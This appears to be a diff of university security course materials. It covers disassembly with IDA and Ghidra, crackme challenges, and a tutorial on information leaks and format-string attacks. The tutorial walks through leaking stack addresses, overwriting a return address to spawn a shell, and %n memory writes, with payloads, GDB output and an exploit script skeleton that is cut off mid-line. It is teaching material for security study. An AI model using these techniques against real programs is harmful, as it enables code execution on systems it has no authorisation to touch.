+ +```asm + 804840c: eb 09 jmp 8048417 <__libc_start_main@plt+0x127> + 804840e: de ad c0 de e9 e8 fisubr WORD PTR [ebp-0x17162140] + 8048414: 7b fb jnp 8048411 <__libc_start_main@plt+0x121> + 8048416: f7 83 ec 0c 68 c0 84 test DWORD PTR [ebx-0x3f97f314],0xe8080484 + 804841d: 04 08 e8 + 8048420: ac lods al,BYTE PTR ds:[esi] + 8048421: fe (bad) + 8048422: ff (bad) + 8048423: ff 83 c4 10 b8 ff inc DWORD PTR [ebx-0x47ef3c] + 8048429: ff (bad) + 804842a: ff (bad) + 804842b: ff 8b 4d fc c9 8d dec DWORD PTR [ebx-0x723603b3] + 8048431: 61 popa + 8048432: fc cld + 8048433: c3 ret +``` + +In order to avoid traps like the one showcased above, we need to use smarter disassembly techniques, such as _Recursive Traversal_. + +### Recursive Traversal + +Note that, in the example above, the misleading instruction is never executed. +If it were, the program would crash after receiving a `SIGILL` signal and after outputting `Illegal instruction (core dumped)`, because the CPU would not know how to decode that particular instruction. +But if we run the binary above, we notice that it doesn't crash. +So that instruction is nothing but dead code. +As a result, it's useless to us no matter what it means. +And this is where _Recursive Traversal_ comes in. + +This strategy doesn't start the disassembly at the beginning of the `.text` section, but at the entry point (the address of the `_start` symbol) and disassembles the instructions linearly, while also considering **jumps**. +Thus, when encountering code branches, the algorithm follows them and creates what's called a **Control Flow Graph (CFG)**, where each node is called a **Basic Block (BB)** and is made up of instructions that are always executed in that order, regardless of conditional jumps or function calls. +Take a look at the CFG below and note the BBs and the jumps that make up the arches. 
+The code comes from the `hyp3rs3rv3r` binary, which can be found [here](https://github.com/hexcellents/sss-exploit/tree/master/sessions/04-static-analysis/activities/02-tutorial-ida-time/src). +To make things harder, this executable was also stripped. +![CFG created by IDA](../media/fork_xref_2.png) + +In conclusion, we can look at the CFG as being a DFS (recursive) traversal of the code, separated into BBs, with `ret` instructions acting as _back edges_. + +## IDA and Ghidra + +The tool that we used in order to generate the image above is called [IDA](https://www.hex-rays.com/products/ida/support/download_freeware/). +Next, we'll learn how to use it! + +We'll showcase the functionalities of IDA by disassembling the `hyp3rs3rv3r` binary. +The first screen you are presented with is the following: + +![Initial IDA Screen](../media/ida_initial_screen.png) + +Main components: + +- On the left you have the **Function window** with the list of identified subroutines, functions or external functions called by the binary. +They are color coded according to the legend right above it. +- Under it you have a graph overview of the view presented on the right. +- On the right you have multiple tabs, with the **Function summary** selected in the IDA-view. +We will not be using this. +Instead, we will switch to the complete **Graph View** of functions by pressing the spacebar. +This graph is the CFG we mentioned earlier. + +Upon pressing spacebar and navigating in the **Function window** to functions that are not coloured (meaning they are part of this binary) we get the following view: +![IDA - First View](../media/ida_first_view.png) + +When reversing binaries, we will see this particular Assembly construct a lot, as it is the standard one generated by `gcc`. 
+Remember from [the "Executables and Processes" session](../../executables-and-processes/reading) that [`__libc_start_main`](https://refspecs.linuxbase.org/LSB_3.1.1/LSB-Core-generic/LSB-Core-generic/baselib---libc-start-main-.html) is the wrapper that calls `main`. +We now rename the last argument pushed on the stack to `main`. +Press `n` and enter the new name. +Now you have your first function identified. +Click on it to see what `main` does: + +![main](../media/ida_main.png) + +Note how the execution is neatly laid out in the CFG view. +If you look at the left panel you can see the complete view. +The execution is divided because of conditional and unconditional branches. +Let's figure out what happens by analyzing the assembly code: + +First we have the function prologue, stack alignment and stack allocation: + +```asm +push ebp +mov ebp, esp +and esp, 0FFFFFFF0h +sub esp, 450h +``` + +Next, a variable on the stack is initialized to 1. +If you click on `434h` it will become highlighted and you can scroll through the whole function to see where it's used later. +We'll ignore this for now. + +```asm +mov dword ptr [esp+434h], 1 +``` + +Next, we see the first branch: + +```asm +cmp [ebp+arg_0], 2 +jz short loc_8049068 +``` + +**Remember!** On 32-bit systems, `[ebp + 0]` is the saved `ebp`, `[ebp + 4]` is the return address and `[ebp + 8]` is the first argument to the current function. +IDA follows a slightly different naming convention: `[ebp + 8]` is named `[ebp+arg_0]`, `[ebp + 12]` is named `[ebp+arg_4]`, etc. +You can rename those `arg_*` constructs if you want. + +So the comparison refers to the first argument: `argc`. +Basically, what it does is: + +```c +if(argc == 2) { + goto loc_8049068; +} else { +.... +} +``` + +What does the `else` branch do?
+ +```asm +mov eax, [ebp+arg_4] +mov eax, [eax] +mov [esp+4], eax +mov dword ptr [esp], offset format ; "Usage: %s \n" +call _printf + +mov dword ptr [esp], 0 ; status +call _exit +``` + +It's pretty straightforward if you remember the tasks from [Session 02](https://github.com/hexcellents/sss-exploit/tree/master/sessions/03-executable-file-formats). +The second argument (`argv`) is dereferenced and its first element (`argv[0]`) is placed on the stack along with a format string. +Then `printf` is called. +Next, `exit` is called with a status of 0. + +```c +if(argc == 2) { + goto loc_8049068; +} else { + printf("Usage: %s \n", argv[0]); + exit(0); +} +``` + +Now let's do something a bit more advanced: we want to identify the 2 commands that the server accepts by using static analysis. +How do we approach this problem as fast as possible? We already know that the server accepts multiple clients. +It can do this through forking. +Let's see where `fork` is called in the program. +First find the `fork` function on the left panel and select it. +Now you see a stub to it from the `PLT` section. +We want to find all locations in the program that call this function. +You can achieve this by obtaining all the **cross-references (xrefs)** to it by pressing `x`. +You should get the following screen: + +![fork cross-references 1](../media/fork_xref_1.png) + +Click that location and you will get to the forking point: + +![fork cross-references 2](../media/fork_xref_2.png) + +You can see that the return value is stored on the stack at `[esp+438h]`, some error checking (`perror` and `exit`) is done and then the return value is checked for 0 (as we traditionally do for `fork` calls). +The child will execute `sub_8048ED7` and the parent will loop back.
+You can rename `sub_8048ED7` to something more legible such as `handle_child_process`. +In this function you can now clearly see the two commands and which function is called for each: + +![handle_child_process](../media/handle_child_process.png) + +It looks like the one on the left, `sub_8048B0B`, handles the `LIST` command, so we rename it to `handle_LIST`. +As expected, it calls `opendir` and `readdir` to read all the files in the current directory, then writes them to the socket. + +![handle_LIST](../media/handle_LIST.png) + +### IDA tips & tricks + +- Saving progress is disabled for the trial version. + However, you can save a limited (but useful) subset of your work using `File -> Produce File -> Dump database to IDC file` and then load it next time using `File -> Script File`. +- If you close some windows and don't know how to get them back you can reset the layout using `Windows -> Reset Desktop`. +- If you want to return to the previous view you can press `Escape`. +- When you want to view code as in `objdump` you only need to press `Spacebar` once. + Press it again to return to CFG mode. +- If there is a hex value and you want to convert it to decimal (or back) press `h`. +- Converting hex/dec values to _ASCII_: press `r`. +- If you want to write comments next to an instruction or a function press `:`. + +### IDA Pro and Ghidra + +IDA Pro is installed on the Kali virtual machine. +The main difference between it and the free version is that the Pro one can also **decompile** the code based on the CFGs listed above. +This will be extremely useful as we hack more and more binaries. + +Another tool that is capable of decompiling the code in an executable is [Ghidra](https://ghidra-sre.org/). +One advantage of Ghidra over IDA is that Ghidra displays both the C and the Assembly code side by side. +This allows us to correlate the two and reap the benefits of both of them at the same time.
+ +## C++ + +Things look slightly different when we try to hack executables that have been compiled from C++ code, instead of C. +The difference comes from the way symbols (method symbols in particular) are handled by C++ compilers. +Let's disassemble the code below and see how its symbols look: + +```cpp +#include <iostream> +using namespace std; +int main() +{ + cout << "Hello world" << endl; + return 0; +} +``` + +Disassembling it in IDA looks familiar at first: + +![IDA start](../media/ida_c%2B%2B_start.png) + +But then the fun starts: + +![IDA main](../media/ida_c%2B%2B_main.png) + +As we can see, all symbols look almost as if they were encrypted. +In fact, this process is called **name mangling**. +If we take a closer look at them, however, we can distinguish some clues about those function calls. +For example, the first one contains the sequences `char_traits` and `basic_ostream`, the former being a C++ abstraction for string operations, while the latter is a base class for output operators, such as `<<`. + +IDA can demangle strings such as the ones above by itself.
+Some recommended settings (you may prefer something different) are the following: + +- `Options -> Demangled names` +- Show demangled C++ names as `Names` +- `Setup short names` +- Click `Only main name` + +These settings only display the important classes and namespaces that make up each method, like this: + +![IDA demangled](../media/ida_c%2B%2B_demangled.png) + +## Further reading + +More information about name mangling can be obtained at: + +- https://en.wikipedia.org/wiki/Name_mangling +- on demand demangling: http://demangler.com/ or `c++filt` + +You can find out more information about the internals of C++ in general, using the following references: + +- https://ocw.cs.pub.ro/courses/cpl/labs/06 (in Romanian) +- https://www.blackhat.com/presentations/bh-dc-07/Sabanal_Yason/Paper/bh-dc-07-Sabanal_Yason-WP.pdf +- http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf + +## Challenges + +### 04. crypto_crackme + +The `crypto_crackme` binary is an application that asks for a secret and uses it to decrypt a message. +In order to solve this task, you have to retrieve the message. + +- Open the binary using IDA and determine the program control flow. + What is it doing after fetching the secret? It seems to be consuming a lot of CPU cycles. + If possible, use IDA to patch the program and reduce the execution time of the application. + Use `Edit -> Patch program -> Change byte...` +- Next, it looks like the program tries to verify if the secret provided is correct. + Where is the secret stored? Is it stored in plain text? Find out what the validation algorithm is. +- Now break it and retrieve the message! + +**Important!**: Unfortunately, the virtual machine doesn't provide the `libssl1.0.0` version of the SSL library. +Use the library files in the task archive and run the executable using: + +```console +LD_LIBRARY_PATH=. ./crypto_crackme +``` + +You can break password hashes (including SHA1) on [CrackStation](https://crackstation.net/).
+ +### 05. broken + +The `broken` binary is asking you for the correct password. +Investigate the binary and provide it with the correct password. +If you provide the correct password, the message `That's correct! The password is '...'` is displayed. + +### 06. hyp3rs3rv3r + +Investigate the `hyp3rs3rv3r` binary and find out where the backdoor function is. +Note that since it's not directly called, IDA doesn't think of it as a procedure, so it won't come up on the left pane. +Figure out a way around this. +When you find that code block you can press `p` on the first instruction to help IDA see it as a procedure. + +**Hint**: In order to exploit the vulnerability in Ubuntu, you should use netcat-traditional. +You can switch from netcat-openbsd to netcat-traditional using the steps described [here](https://stackoverflow.com/questions/10065993/how-to-switch-to-netcat-traditional-in-ubuntu).
diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md b/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md index 0f090fe..126f0cb 100644 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md @@ -1,673 +1,673 @@ -# Information Leaks - -## Introduction - -#### Objectives & Rationale - -This is a tutorial-based lab. -Throughout this lab you will learn about frequent errors that occur when handling strings. -This tutorial is focused on the C language. -Generally, OOP languages (like Java, C#, C++) use classes to represent strings -- this simplifies the way strings are handled and decreases the frequency of programming errors. - -#### What is a String? - -Conceptually, a string is a sequence of characters. -The representation of a string can be done in multiple ways. -One way is to represent a string as a contiguous memory buffer. -Each character is **encoded** in some way.
-For example, the **ASCII** encoding uses 7-bit integers to encode each character -- because it is more convenient to store 8 bits at a time in a byte, an ASCII character is stored in one byte. - -The type for representing an ASCII character in C is `char` and it uses one byte. -As a side note, `sizeof(char) == 1` is the only size guarantee that the [C standard](http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf "http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf") gives. - -Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). -The idea is that in order to represent a Unicode string, **more than one** byte is needed for **one** character. -`char16_t`, `char32_t` were introduced in the C standard to represent these strings. -The C language also has another type, called `wchar_t`, which is implementation defined and should not be used to represent Unicode characters. - -Our tutorial will focus on ASCII strings, where each character is represented in one byte. -We will show a few examples of what happens when one calls *string manipulation functions* that are assuming a specific encoding of the string. - -You will find extensive information on ASCII in the [ascii man page](http://man7.org/linux/man-pages/man7/ascii.7.html "http://man7.org/linux/man-pages/man7/ascii.7.html"). - -Inside a Unix terminal, issue the command: - -```console -man ascii -``` - -### Length Management - -In C, the length of an ASCII string is given by its contents. -An ASCII string ends with a `0` value byte called the `NUL` byte. -Every `str*` function (i.e. a function whose name starts with `str`, such as `strcpy`, `strcat`, `strdup`, `strstr` etc.) uses this `0` byte to detect where the string ends. -As a result, not ending strings in `0` and using `str*` functions leads to vulnerabilities. - -### 1. Basic Info Leak (tutorial) - - -Enter the `01-basic-info-leak/` subfolder. -It's a basic information leak example.
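
To make the role of the terminating `NUL` byte concrete, here is a minimal Python sketch that simulates how a `str*` function scans memory. The helper name `c_strlen` and the memory contents are assumptions made up for illustration; the real functions operate on raw process memory, not on Python `bytes`.

```python
def c_strlen(memory: bytes, start: int) -> int:
    """Count bytes from `start` up to (not including) the first NUL byte,
    the way strlen() walks memory."""
    end = memory.index(b"\x00", start)
    return end - start


# Hypothetical layout: an 8-byte buffer immediately followed by other data
# (arbitrary non-zero bytes standing in for neighbouring stack contents).
neighbour = b"\xd0\x66\x57\xb4\xfc\x7f\x00\x00"

terminated = b"hello\x00\x00\x00" + neighbour    # buffer ends with NUL bytes
unterminated = b"AAAAAAAA" + neighbour           # buffer completely filled

print(c_strlen(terminated, 0))     # 5
print(c_strlen(unterminated, 0))   # 14: the scan runs into the neighbouring data
```

In the second case the reported length covers six bytes that were never part of the buffer, which is exactly the kind of over-read that turns into an information leak when the string is printed.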
- -In `basic_info_leak.c`, `buf` is supplied as input, hence is not trusted. -We should be careful with this buffer. -If the user gives `32` bytes as input then `strcpy` will copy bytes in `my_string` until it finds a `NUL` byte (`0x00`). -Because the [stack grows down](/courses/cns/labs/lab-05 "cns:labs:lab-05"), on most platforms, we will start accessing the content of the stack. -After the `buf` variable the stack stores the `old rbp`, the function return address and then the function parameters. -This information is copied into `my_string`. -As such, printing information in `my_string` (after byte index `32`) using `puts()` results in information leaks. - -We can test this using: - -```console -$ python -c 'print("A"*32)' | ./basic_info_leak -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�8� -``` - -In order to check the hexadecimal values of the leak, we pipe the output -through `xxd`: - -```console -$ python -c 'print("A"*32)' | ./basic_info_leak | xxd -00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA -00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA -00000020: d066 57b4 fc7f 0a .fW.... -``` - -We have leaked one value above: - -- the lower non-0 bytes of the old/stored `rbp` value (right after the buffer) -- `0x7ffcb45766d0` (it's a little endian architecture); - it will differ on your system - -The return address usually doesn't change (except for executables with PIE, *Position Independent Executable* support). -But assuming ASLR is enabled, the `rbp` value changes at each run. -If we leak it we have a basic address that we can toy around to leak or overwrite other values. - -### 2. Information Leak - -We will now show how improper string handling will lead to information leaks from the memory. -For this, please access the `02-info-leak/` subfolder. -Please browse the `info-leak.c` source code file. - -The snippet below is the relevant code snippet. -The goal is to call the `my_evil_func()` function. 
-One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. -If you have memory writes, then getting code execution is a matter of getting things right. -In this task we are assuming that we have memory write (i.e. we can write any value at any address). -You can call the `my_evil_func()` function by overriding the return address of the `my_main()` function: - -```c -#define NAME_SZ 32 -  -static void read_name(char *name) -{ - memset(name, 0, NAME_SZ); - read(0, name, NAME_SZ); - //name[NAME_SZ-1] = 0; -} -  -static void my_main(void) -{ - char name[NAME_SZ]; -  - read_name(name); - printf("hello %s, what address to modify and with what value?\n", name); - fflush(stdout); - my_memory_write(); - printf("Returning from main!\n"); -} -``` - -What catches our eye is that the `read()` function call in the `read_name()` function read **exactly** `32` bytes. -If we provide it `32` bytes it won't be null-terminated and will result in an information leak when `printf()` is called in the `my_main()` function. - -#### Exploiting the Memory Write Using the Info Leak - -Let's first try to see how the program works: - -```console -$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak -hello AAAAAAAAAA, what address to modify and with what value? -``` - -The binary wants an input from the user using the `read()` library call as we can see below: - -```console -$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak -read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512 -read(0, "AAAAAAAAAA", 32) = 10 -hello AAAAAAAAAA, what address to modify and with what value? -read(0, "", 4) = 0 -+++ exited with 255 +++ -``` - -The input is read using the `read()` system call. -The first read expects 32 bytes. -You can see already that there's another `read()` call. -That one is the first `read()` call in the `my_memory_write()` function. 
- -As noted above, if we use exactly `32` bytes for name we will end up with a non-null-terminated string, leading to an information leak. -Let's see how that goes: - -```console -$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak -hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value? -  -$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd -00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141 hello AAAAAAAAAA -00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA -00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh -00000030: 6174 2061 6464 7265 7373 2074 6f20 6d6f at address to mo -00000040: 6469 6679 2061 6e64 2077 6974 6820 7768 dify and with wh -00000050: 6174 2076 616c 7565 3f0a at value?. -``` - -We see we have an information leak. -We leak one piece of data above: `0x7fffffffdcf0`. -If we run multiple times we can see that the values for the first piece of information differs: - -```console -$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ',' -00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh -``` - -The variable part is related to a stack address (it starts with `0x7f`); it varies because ASLR is enabled. -We want to look more carefully using GDB and figure out what the variable value represents: - -```console -$ gdb -q ./info_leak -Reading symbols from ./info_leak...done. -gdb-peda$ b my_main -Breakpoint 1 at 0x400560 -gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")') -Starting program: info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")') -[...] -  -# Do next instructions until after the call to printf. -gdb-peda$ ni -.... 
-  -gdb-peda$ x/12g name -0x7fffffffdc20: 0x4141414141414141 0x4141414141414141 -0x7fffffffdc30: 0x4141414141414141 0x4141414141414141 -0x7fffffffdc40: 0x00007fffffffdc50 0x00000000004007aa -gdb-peda$ x/2i 0x004007aa - 0x4007aa : mov edi,0x4008bc - 0x4007af : call 0x400550 -gdb-peda$ pdis main -Dump of assembler code for function main: - 0x00000000004007a1 <+0>: push rbp - 0x00000000004007a2 <+1>: mov rbp,rsp - 0x00000000004007a5 <+4>: call 0x400756 - 0x00000000004007aa <+9>: mov edi,0x4008bc - 0x00000000004007af <+14>: call 0x400550 - 0x00000000004007b4 <+19>: mov eax,0x0 - 0x00000000004007b9 <+24>: pop rbp - 0x00000000004007ba <+25>: ret -End of assembler dump. -gdb-peda$ -``` - -From the GDB above, we determine that, after our buffer, there is the stored `rbp` (i.e. old rbp). - -In 32-bit program there would (usually) be 2 leaked values: - -1. The old `ebp` -1. The return address of the function - -This happens if the values of the old `ebp` and the return address don't have any `x00` bytes. - -In the 64-bit example we only get the old `rbp` because the 2 high bytes of the stack address are always `0` which causes the string to be terminated early. - -When we leak the two values we are able to retrieve the stored `rbp` value. -In the above run the value of `rbp` is `0x00007fffffffdc50`. -We also see that the stored `rbp` value is stored at **address** `0x7fffffffdc40`, which is the address current `rbp`. -We have the situation in the below diagram: - -![](https://ocw.cs.pub.ro/courses/_media/cns/labs/info-leak-stack-64.png) - -We marked the stored `rbp` value (i.e. the frame pointer for `main()`: `0x7fffffffdc50`) with the font color red in both places. - -In short, if we leak the value of the stored `rbp` (i.e. the frame pointer for `main()`: `0x00007fffffffdc50`) we can determine the address of the current `rbp` (i.e. the frame pointer for `my_main()`: `0x7fffffffdc40`), by subtracting `16`. 
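
The address arithmetic can be sketched in a few lines of Python. This is only an illustration under stated assumptions: `parse_leak` is a hypothetical helper, and the program output is simulated using the stored `rbp` value from the GDB run above (`0x7fffffffdc50`) instead of being read from the real process.

```python
import struct

NAME_SZ = 32  # size of the name buffer in info-leak.c


def parse_leak(output: bytes) -> int:
    """Decode the bytes printed right after the 32-byte name as a
    little-endian 64-bit pointer."""
    start = len(b"hello ") + NAME_SZ
    end = output.index(b", what address", start)
    leak = output[start:end]
    # printf() stops at the first NUL byte, so the two high zero bytes
    # are missing from the output; pad them back before unpacking.
    return struct.unpack("<Q", leak.ljust(8, b"\x00"))[0]


# Simulated output of the program for a 32-byte name.
output = (b"hello " + b"A" * NAME_SZ + bytes.fromhex("50dcffffff7f")
          + b", what address to modify and with what value?\n")

old_rbp = parse_leak(output)       # frame pointer of main()
current_rbp = old_rbp - 16         # frame pointer of my_main()
ret_addr_slot = old_rbp - 8        # where my_main()'s return address is stored

print(hex(old_rbp), hex(current_rbp), hex(ret_addr_slot))
```

The offsets `16` and `8` hold only for the stack layout shown in this run; a different compiler or different local variables may change them, so they should be confirmed in GDB.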
-The address where the `my_main()` return address is stored (`0x7fffffffdc48`) is computed by subtracting `8` from the leaked `rbp` value. -By overwriting the value at this address we will force an arbitrary code execution and call `my_evil_func()`. - -In order to write the return address of the `my_main()` function with the address of the `my_evil_func()` function, make use of the conveniently (but not realistically) placed `my_memory_write()` function. -The `my_memory_write()` allows the user to write arbitrary values to arbitrary memory addresses. - -Considering all of this, update the `TODO` lines of the `exploit.py` script to make it call the `my_evil_func()` function. - -Same as above, use `nm` to determine address of the `my_evil_func()` function. -When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. -The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). - -Use the above logic to determine the `old rbp` leak and then the address of the `my_main()` return address. - -See [here](https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack "https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack") examples of using the `unpack()` function. - -In case of a successful exploit the program will spawn a shell in the `my_evil_func()` function, same as below: - -```console -$ python exploit.py -[!] Could not find executable 'info_leak' in $PATH, using './info_leak' instead -[+] Starting local process './info_leak': pid 6422 -[*] old_rbp is 0x7fffffffdd40 -[*] return address is located at is 0x7fffffffdd38 -[*] Switching to interactive mode -Returning from main! 
-$ id -uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) -``` - -The rule of thumb is: **Always know your string length.** - -#### Format String Attacks - -We will now see how (im)proper use of `printf` may provide us with ways of extracting information or doing actual attacks. - -Calling `printf` or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called **format string attack**. - -The definition of `printf`: - -```c -int printf(const char *format, ...); -``` - -Let's recap some of [useful formats](http://www.cplusplus.com/reference/cstdio/printf/ "http://www.cplusplus.com/reference/cstdio/printf/"): - -- `%08x` -- prints a number in hex format, meaning takes a number from the stack and prints in hex format -- `%s` -- prints a string, meaning takes a pointer from the stack and prints the string from that address -- `%n` -- writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). -This format is not widely used but it is in the C standard. -- `%x` and `%n` are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user. - -### Example 2 - -```c -printf(my_string); -``` - -The above snippet is a good example of why ignoring compile time warnings is dangerous. -The given example is easily detected by a static checker. - -Try to think about: - -- The peculiarities of `printf` (variable number of arguments) -- Where `printf` stores its arguments (*hint*: on the stack) -- What happens when `my_string` is `"%x"` -- How matching between format strings (e.g. 
the one above) and arguments is enforced (*hint*: it's not) and what happens in general when the number of arguments doesn't match the number of format specifiers -- How we could use this to cause information leaks and arbitrary memory writes (*hint*: see the format specifiers at the beginning of the section) - -### Example 3 - -We would like to check some of the well known and not so-well known features of [the printf function](http://man7.org/linux/man-pages/man3/printf.3.html "http://man7.org/linux/man-pages/man3/printf.3.html"). -Some of them may be used for information leaking and for attacks such as format string attacks. - -Go into `printf-features/` subfolder and browse the `printf-features.c` file. -Compile the executable file using: - -```console -make -``` - -and then run the resulting executable file using - -```console -./printf-features -``` - -Go through the `printf-features.c` file again and check how print, length and conversion specifiers are used by `printf`. -We will make use of the `%n` feature that allows memory writes, a requirement for attacks. - -### Basic Format String Attack - -You will now do a basic format string attack using the `03-basic-format-string/` subfolder. -The source code is in `basic_format_string.c` and the executable is in `basic_format_string`. - -You need to use `%n` to overwrite the value of the `v` variable to `0x300`. -You have to do three steps: - -1. Determine the address of the `v` variable using `nm`. - -1. Determine the `n`-th parameter of `printf()` that you can write to using `%n`. -The `buffer` variable will have to be that parameter; you will store the address of the `v` variable in the `buffer` variable. - -1. Construct a format string that enables the attack; the number of characters processed by `printf()` until `%n` is matched will have to be `0x300`. - - -For the second step let's run the program multiple times and figure out where the `buffer` address starts. 
-We fill `buffer` with the `aaaa` string and we expect to discover it using the `printf()` format specifiers. - -```console -$ ./basic_format_string -AAAAAAAA -%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx -7fffffffdcc07fffffffdcc01f6022897ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25 - -$ ./basic_format_string -AAAAAAAA -%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx -x7fffffffdcc07fffffffdcc0116022917ffff7dd18d06c6c25786c6c25786c6c25786c6c25786c6c25786c6c25787fffffffdcc07fffffffdcc01f6022917ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a - -$ ./basic_format_string -AAAAAAAA -%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx -7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a4141414141414141 -``` - -In the last run we get the `4141414141414141` representation of `AAAAAAAA`. -That means that, if we replace the final `%lx` with `%n`, we will write at the address `0x4141414141414141` the number of characters processed so far: - -```console -$ echo -n '7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a' | wc -c -162 -``` - -We need that number to be `0x300`. -You can fine tune the format string by using a construct such as `%32llx` to print a number on `32` characters instead of a maximum of `16` characters. -See how much extra room you need and see if you reach `0x300` bytes. - -The construct needn't use a multiple of `8` for length. -You may use the `%32llx` or `%33llx` or `%42llx`. -The numeric argument states the length of the print output. - -After the plan is complete, write down the attack by filling the `TODO` lines in the `exploit.py` solution skeleton. 
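
The padding needed to reach `0x300` can be estimated with a short calculation. The sketch below assumes the counts from the run above (162 characters printed before the final specifier, the first value `7fffffffdcc0` being 12 characters long); `padded_width` is a hypothetical helper, not part of the exploit skeleton.

```python
def padded_width(printed_before_n: int, natural_len: int, target: int) -> int:
    """Field width N for one `%Nllx` specifier so that exactly `target`
    characters have been printed when `%n` is reached."""
    # Characters produced by everything except the specifier we pad.
    others = printed_before_n - natural_len
    width = target - others
    if width < natural_len:
        raise ValueError("target is too small for this layout")
    return width


# 162 characters printed so far, first value is 12 characters long.
width = padded_width(162, 12, 0x300)
print(width)  # 618

# Sanity check with Python's own formatting: the padded value is 618 wide.
assert len(format(0x7FFFFFFFDCC0, f"{width}x")) == 618
```

Keep in mind that the format string itself is stored in `buffer` and gets printed back as hex, so changing `%llx` into `%618llx` also changes the printed output; the count should be measured again after each change.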
- -When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. -The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). - -After you write `0x300` into `v`, you should obtain a shell: - -```console -$ python exploit64.py -[!] Could not find executable 'basic_format_string' in $PATH, using './basic_format_string' instead -[+] Starting local process './basic_format_string': pid 20785 -[*] Switching to interactive mode - 7fffffffdcc0 7fffffffdcc01f60229b7ffff7dd18d03125786c6c393425786c6c25786c6c34786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25a6e25 -$ -``` - -### Extra: Format String Attack - -Go to the `04-format-string/` subfolder. -In this task you will be working with a **32-bit binary**. - -The goal of this task is to call `my_evil_func` again. -This task is also tutorial based. - -```c -int main(int argc, char *argv[]) -{ - printf(argv[1]); - printf("\nThis is the most useless and insecure program!\n"); - return 0; -} -``` - -#### Transform Format String Attack to a Memory Write - -Any string that represents a useful format (e.g. `%d`, `%x` etc.) can be used to discover the vulnerability. - -```console -$ ./format "%08x %08x %08x %08x" -00000000 f759d4d3 00000002 ffd59bd4 -This is the most useless and insecure program! -``` - -The values starting with `0xf` are very likely pointers. -Again, we can use this vulnerability as an information leak. -But we want more. - -Another useful format for us is `%m$` followed by any normal format selector, which means that the `m`th parameter is used as the input for the format that follows. -For example, `%10$08x` will print the `10`th parameter with `%08x`. -This gives us precise access to the stack.
- -Example: - -```console -$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x" -00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24 -This is the most useless and insecure program! -``` - -Note the equivalence between formats. -Now, because we are able to select *any* higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer. - -```console -$ ./format "$(python -c 'print("%08x\n" * 10000)')" -``` - -Depending on your setup you should be able to view the hex -representation of the string "%08x\\n". - -**Why do we need our own buffer?** -Remember the `%n` format? -It can be used to write at an address given as parameter. -The idea is to give this address as parameter and achieve memory writing. -We will see later how to control the value. - -The next steps are done with ASLR disabled. -In order to disable ASLR, please run: - -```console -echo 0 | sudo tee /proc/sys/kernel/randomize_va_space -``` - -By trial and error or by using GDB (breakpoint on `printf`) we can determine where the buffer starts: - -```console -$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"%08x\n " * 0x300)')" | grep -n 41 | head -10: ffffc410 -52: ffffcc41 -72: ffffcf41 -175: 44434241 -``` - -Command line Python exploits tend to get very tedious and hard to read when the payload gets more complex. -You can use the following reference pwntools script to write your exploit. -The code is equivalent to the above one-liner. - -```python -#!/usr/bin/env python3 -  -from pwn import * -  -stack_items = 200 -  -pad = b"ABCD" -val_fmt = b"%08x\n " -# add a \n at the end for consistency with the command line run -fmt = pad + val_fmt * 